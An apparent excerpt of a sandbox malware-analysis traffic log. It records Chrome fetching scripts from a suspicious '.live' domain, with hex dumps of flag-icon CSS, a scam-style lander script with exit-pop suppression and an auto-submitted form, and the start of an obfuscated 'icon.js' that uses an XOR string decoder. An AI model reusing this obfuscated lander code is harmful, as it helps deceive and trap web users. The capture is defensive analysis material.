                              x-amz-meta-mc-attrs: atime:1695223446#151840557/gid:0/gname:root/mode:33279/mtime:1655387459#318598233/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-06-16T13:50:59.318598233Z
                              Expires: Fri, 21 Feb 2025 07:09:37 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:37 UTC3310INData Raw: 2f 2a 20 67 65 6f 20 6c 6f 63 61 74 69 6f 6e 20 63 73 73 20 2a 2f 0d 0a 23 75 73 65 72 4c 6f 63 61 74 69 6f 6e 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 65 6d 3b 0d 0a 7d 0d 0a 23 75 73 65 72 4c 6f 63 61 74 69 6f 6e 20 2e 66 6c 61 67 2d 69 63 6f 6e 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 74 6f 70 3a 20 2d 30 2e 30 35 65 6d 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 30 2e 33 65 6d 3b 0d 0a 7d 0d 0a 2f 2a 20 66 6c 61 67 2d 69 63 6f 6e 20 63 73 73 20 2a 2f 0d 0a 2e 66 6c 61 67
                              Data Ascii: /* geo location css */#userLocation { display: inline; position: relative; line-height: 1em;}#userLocation .flag-icon { display: inline-block; position: relative; top: -0.05em; margin-right: 0.3em;}/* flag-icon css */.flag
                              2024-02-22 07:09:37 UTC4096INData Raw: 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 62 62 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 62 62 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 62 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 62 64 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 62 64 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 62 64 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d
                              Data Ascii: );}.flag-icon-bb.flag-icon-squared { background-image: url(../flags/1x1/bb.svg);}.flag-icon-bd { background-image: url(../flags/4x3/bd.svg);}.flag-icon-bd.flag-icon-squared { background-image: url(../flags/1x1/bd.svg);}.flag-icon-
                              2024-02-22 07:09:37 UTC4096INData Raw: 33 2f 63 6b 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 63 6b 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 63 6b 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 63 6c 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 63 6c 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 63 6c 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 63 6c 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c
                              Data Ascii: 3/ck.svg);}.flag-icon-ck.flag-icon-squared { background-image: url(../flags/1x1/ck.svg);}.flag-icon-cl { background-image: url(../flags/4x3/cl.svg);}.flag-icon-cl.flag-icon-squared { background-image: url(../flags/1x1/cl.svg);}.fl
                              2024-02-22 07:09:37 UTC4096INData Raw: 66 6c 61 67 73 2f 34 78 33 2f 66 6b 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 66 6b 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 66 6b 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 66 6d 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 66 6d 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 66 6d 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 66 6d 2e 73 76 67 29 3b
                              Data Ascii: flags/4x3/fk.svg);}.flag-icon-fk.flag-icon-squared { background-image: url(../flags/1x1/fk.svg);}.flag-icon-fm { background-image: url(../flags/4x3/fm.svg);}.flag-icon-fm.flag-icon-squared { background-image: url(../flags/1x1/fm.svg);
                              2024-02-22 07:09:37 UTC4096INData Raw: 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 68 72 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 68 72 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 68 72 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 68 74 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 68 74 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 68 74 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f
                              Data Ascii: url(../flags/4x3/hr.svg);}.flag-icon-hr.flag-icon-squared { background-image: url(../flags/1x1/hr.svg);}.flag-icon-ht { background-image: url(../flags/4x3/ht.svg);}.flag-icon-ht.flag-icon-squared { background-image: url(../flags/1x1/
                              2024-02-22 07:09:37 UTC4096INData Raw: 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 6b 7a 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 6b 7a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 6b 7a 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 6c 61 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 6c 61 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 6c 61 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c
                              Data Ascii: d-image: url(../flags/4x3/kz.svg);}.flag-icon-kz.flag-icon-squared { background-image: url(../flags/1x1/kz.svg);}.flag-icon-la { background-image: url(../flags/4x3/la.svg);}.flag-icon-la.flag-icon-squared { background-image: url(../fl
                              2024-02-22 07:09:37 UTC4096INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 6d 73 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 6d 73 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 6d 73 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 6d 74 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 6d 74 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 6d 74 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75
                              Data Ascii: ackground-image: url(../flags/4x3/ms.svg);}.flag-icon-ms.flag-icon-squared { background-image: url(../flags/1x1/ms.svg);}.flag-icon-mt { background-image: url(../flags/4x3/mt.svg);}.flag-icon-mt.flag-icon-squared { background-image: u
                              2024-02-22 07:09:37 UTC4096INData Raw: 6c 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 70 6c 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 70 6c 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 70 6c 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 70 6d 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 70 6d 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 70 6d 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d
                              Data Ascii: l { background-image: url(../flags/4x3/pl.svg);}.flag-icon-pl.flag-icon-squared { background-image: url(../flags/1x1/pl.svg);}.flag-icon-pm { background-image: url(../flags/4x3/pm.svg);}.flag-icon-pm.flag-icon-squared { background-
                              2024-02-22 07:09:37 UTC4096INData Raw: 67 2d 69 63 6f 6e 2d 73 6f 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 73 6f 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 6f 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 73 6f 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 72 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 73 72 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 72 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63
                              Data Ascii: g-icon-so { background-image: url(../flags/4x3/so.svg);}.flag-icon-so.flag-icon-squared { background-image: url(../flags/1x1/so.svg);}.flag-icon-sr { background-image: url(../flags/4x3/sr.svg);}.flag-icon-sr.flag-icon-squared { bac
                              2024-02-22 07:09:37 UTC3728INData Raw: 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 75 73 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 75 73 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 75 73 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 31 78 31 2f 75 73 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 75 79 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2e 2e 2f 66 6c 61 67 73 2f 34 78 33 2f 75 79 2e 73 76 67 29 3b 0d 0a 7d 0d 0a 2e 66 6c 61 67 2d 69 63 6f 6e 2d 75 79 2e 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20
                              Data Ascii: }.flag-icon-us { background-image: url(../flags/4x3/us.svg);}.flag-icon-us.flag-icon-squared { background-image: url(../flags/1x1/us.svg);}.flag-icon-uy { background-image: url(../flags/4x3/uy.svg);}.flag-icon-uy.flag-icon-squared


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.449745185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC687OUTGET /media/mainstream/all/ab/1102_3.js HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:37 UTC785INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:37 GMT
                              Content-Type: text/javascript
                              Content-Length: 7481
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "ae061c759f20723e38540a261f2127d7"
                              Last-Modified: Sun, 11 Feb 2024 15:21:05 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB64EDEAF26
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1707664865#538664118/gid:0/gname:root/mode:33188/mtime:1707664865#586664197/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2024-02-11T15:21:05.615Z
                              Expires: Fri, 21 Feb 2025 07:09:37 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:37 UTC3311INData Raw: 66 75 6e 63 74 69 6f 6e 20 73 74 65 70 66 69 6e 61 6c 28 29 20 7b 0a 20 20 20 20 6a 51 75 65 72 79 28 22 23 70 5f 62 6f 64 79 5f 63 6f 6e 74 65 6e 74 22 29 2e 66 61 64 65 4f 75 74 28 22 73 6c 6f 77 22 29 3b 0a 20 20 20 20 6a 51 75 65 72 79 28 22 23 70 5f 6c 6f 61 64 69 6e 67 22 29 2e 66 61 64 65 49 6e 28 22 73 6c 6f 77 22 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 67 6f 54 6f 55 72 6c 46 69 6e 69 73 68 28 29 20 7b 0a 20 20 20 20 73 74 65 70 66 69 6e 61 6c 28 29 3b 0a 20 20 20 20 50 72 65 76 65 6e 74 45 78 69 74 50 6f 70 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 5f 66 6f 72 6d 5f 70 6f 73 74 22 29 2e 73 75 62 6d 69 74 28 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 73 63 72 6f
                              Data Ascii: function stepfinal() { jQuery("#p_body_content").fadeOut("slow"); jQuery("#p_loading").fadeIn("slow");}function goToUrlFinish() { stepfinal(); PreventExitPop = false; document.getElementById("p_form_post").submit();}function scro
                              2024-02-22 07:09:37 UTC4096INData Raw: 72 28 29 29 3b 0a 20 20 20 20 6a 51 75 65 72 79 28 22 2e 63 73 73 31 31 30 32 5f 31 36 22 29 2e 74 65 78 74 28 64 61 79 4e 61 6d 65 73 5b 62 2e 67 65 74 44 61 79 28 29 5d 29 3b 0a 20 20 20 20 6a 51 75 65 72 79 28 22 2e 63 73 73 31 31 30 32 5f 31 30 22 29 2e 74 65 78 74 28 6d 6f 6e 74 68 4e 61 6d 65 73 5b 62 2e 67 65 74 4d 6f 6e 74 68 28 29 5d 29 3b 0a 20 20 20 20 69 66 20 28 6a 51 75 65 72 79 28 22 2e 70 5f 76 61 72 2d 62 72 6f 77 73 65 72 22 29 2e 6c 65 6e 67 74 68 20 3e 3d 20 31 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 67 65 74 42 72 6f 77 73 65 72 28 29 3b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 22 2e 70 5f 76 61 72 2d 62 72 6f 77 73 65 72 22 29 2e 74 65 78 74 28 63 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 69 66 20 28 6a 51 75
                              Data Ascii: r()); jQuery(".css1102_16").text(dayNames[b.getDay()]); jQuery(".css1102_10").text(monthNames[b.getMonth()]); if (jQuery(".p_var-browser").length >= 1) { var c = getBrowser(); jQuery(".p_var-browser").text(c); } if (jQu
                              2024-02-22 07:09:37 UTC74INData Raw: 69 6e 69 20 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 52 6f 6f 74 2e 5f 69 6e 69 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 29 3b 0a 7d 29 28 29 3b
                              Data Ascii: ini == "undefined") { boxRoot._init(); } });})();


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.449746185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC678OUTGET /media/mainstream/icon.js HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:37 UTC799INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:37 GMT
                              Content-Type: application/javascript
                              Content-Length: 6570
                              Connection: close
                              ETag: "a8e36248f01478844f0c4db185e945a0"
                              Last-Modified: Wed, 20 Sep 2023 15:24:17 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB64CA76084
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#220024380/gid:0/gname:root/mode:33279/mtime:1655387452#842583333/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-06-16T13:50:52.842583333Z
                              Expires: Fri, 21 Feb 2025 07:09:37 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:37 UTC3297INData Raw: 63 6f 6e 73 74 20 5f 30 78 33 37 39 31 3d 5b 27 46 38 6f 48 42 77 54 66 64 43 6f 50 57 52 33 63 4c 49 44 64 6e 71 27 2c 27 42 43 6f 65 72 6d 6f 75 64 67 30 37 67 32 64 63 4c 38 6f 55 43 58 38 27 2c 27 70 71 4b 6b 57 35 76 35 63 61 64 64 55 4a 6c 63 51 43 6b 68 62 57 27 2c 27 57 34 50 6d 57 50 69 4c 57 52 52 64 53 38 6f 4d 57 50 4f 72 57 52 68 64 48 33 79 4d 70 61 27 2c 27 57 50 6e 64 6d 71 71 44 57 4f 71 57 77 75 6a 56 44 43 6b 58 27 2c 27 57 37 76 6d 57 34 44 65 57 36 68 63 48 58 4e 63 4f 6d 6b 47 57 34 53 27 2c 27 57 36 68 63 49 31 43 52 45 6d 6f 70 57 4f 31 63 76 47 27 2c 27 57 36 30 31 57 36 5a 63 56 4e 7a 67 27 2c 27 79 78 78 64 50 6d 6b 46 57 36 6d 50 57 35 4f 47 61 66 75 36 57 37 53 57 57 36 4f 27 2c 27 65 74 38 67 57 36 52 64 4b 43 6f 61 57 37 4e
                              Data Ascii: const _0x3791=['F8oHBwTfdCoPWR3cLIDdnq','BCoermoudg07g2dcL8oUCX8','pqKkW5v5caddUJlcQCkhbW','W4PmWPiLWRRdS8oMWPOrWRhdH3yMpa','WPndmqqDWOqWwujVDCkX','W7vmW4DeW6hcHXNcOmkGW4S','W6hcI1CREmopWO1cvG','W601W6ZcVNzg','yxxdPmkFW6mPW5OGafu6W7SWW6O','et8gW6RdKCoaW7N
                              2024-02-22 07:09:37 UTC3273INData Raw: 78 36 38 64 62 34 35 5d 3d 5f 30 78 35 66 30 62 61 65 5b 5f 30 78 35 35 63 30 32 39 5d 2c 5f 30 78 35 66 30 62 61 65 5b 5f 30 78 35 35 63 30 32 39 5d 3d 5f 30 78 32 30 61 38 37 37 2c 5f 30 78 34 38 36 32 63 61 2b 3d 53 74 72 69 6e 67 5b 27 66 72 6f 6d 43 68 61 72 43 6f 64 65 27 5d 28 5f 30 78 34 63 61 65 64 39 5b 27 63 68 61 72 43 6f 64 65 41 74 27 5d 28 5f 30 78 31 61 33 64 65 37 29 5e 5f 30 78 35 66 30 62 61 65 5b 28 5f 30 78 35 66 30 62 61 65 5b 5f 30 78 36 38 64 62 34 35 5d 2b 5f 30 78 35 66 30 62 61 65 5b 5f 30 78 35 35 63 30 32 39 5d 29 25 30 78 31 30 30 5d 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 34 38 36 32 63 61 3b 7d 3b 5f 30 78 35 64 31 33 5b 27 6c 77 49 43 4f 54 27 5d 3d 5f 30 78 31 37 61 32 38 62 2c 5f 30 78 32 30 36 36 64 64 3d 61 72 67 75 6d
                              Data Ascii: x68db45]=_0x5f0bae[_0x55c029],_0x5f0bae[_0x55c029]=_0x20a877,_0x4862ca+=String['fromCharCode'](_0x4caed9['charCodeAt'](_0x1a3de7)^_0x5f0bae[(_0x5f0bae[_0x68db45]+_0x5f0bae[_0x55c029])%0x100]);}return _0x4862ca;};_0x5d13['lwICOT']=_0x17a28b,_0x2066dd=argum


                              Session IDSource IPSource PortDestination IPDestination Port
                              14192.168.2.458776185.155.184.55443
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC679OUTGET /media/mainstream/sound.js HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:37 UTC798INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:37 GMT
                              Content-Type: application/javascript
                              Content-Length: 5014
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "1f1fed792da20aa1e75213d3f1839a0d"
                              Last-Modified: Mon, 20 Feb 2023 09:35:22 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB653BC8137
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1676843338#355669793/gid:0/gname:root/mode:33279/mtime:1655387452#846583343/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-06-16T13:50:52.846583343Z
                              Expires: Fri, 21 Feb 2025 07:09:37 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
